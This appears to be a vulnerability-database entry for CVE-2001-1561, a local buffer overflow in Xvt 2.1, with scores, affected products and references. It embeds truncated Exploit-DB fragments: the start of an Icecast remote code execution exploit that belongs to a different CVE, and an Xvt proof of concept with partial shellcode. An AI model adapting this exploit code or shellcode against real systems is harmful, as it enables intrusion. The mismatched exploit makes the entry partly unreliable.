CVE-2001-1561
Published 2001-12-31
CVE-2001-1561: Buffer overflow in Xvt 2.1 in Debian Linux 2.2 allows local users to execute arbitrary code via long (1) -name and (2) -T arguments.
Priority P421 · high · 7.2 (CVSS 2.0)
AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 1.20% (64.4th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| john_bovey | xvt | — | — |
No detection rules found.
Exploit-DB
exploitdb·2004-10-06
CVE-2004-1561 Icecast 2.0.1 (Win32) - Remote Code Execution (1)
---
/*
by Luigi Auriemma
Shellcode add-on by Delikon
www.Delikon.de
Because of all the forbidden bytes in a http get request
i had to use a very small shellcode, which was blown up
by Msf::Encoder::PexAlphaNum. Great encoder.
C:\>iceexec 127.0.0.1
Icecast nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Icecast2 Win32>
*/
#include
#include
#include
#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ 2048
#define TIMEOUT 3
#define EXEC "GET / HTTP/1.0\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a
Exploit-DB
exploitdb·2001-07-02
CVE-2001-1561 Xvt 2.1 - Local Buffer Overflow
---
// source: https://www.securityfocus.com/bid/2955/info
Xvt is a terminal emulator for systems using X11R6. It is often installed setuid/setgid so that it runs with the enhanced privileges required to log user sessions.
Xvt contains a buffer overflow in its handling of the '-name' argument.
An attacker can exploit this buffer overflow to execute arbitrary code with the enhanced privileges of Xvt. On some systems Xvt is installed setuid root. This may not be the case for all systems.
/*
/usr/bin/X11/xvt overflow proof of concept by [email protected].
tshaw:~$ ./expl
bash#
*/
#include
#include
int main()
{
char buf[234];
int i;
char code[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2001-07/0024.html
http://www.debian.org/security/2001/dsa-082
http://www.iss.net/security_center/static/6781.php
http://www.securityfocus.com/bid/2955
http://www.securityfocus.com/bid/2964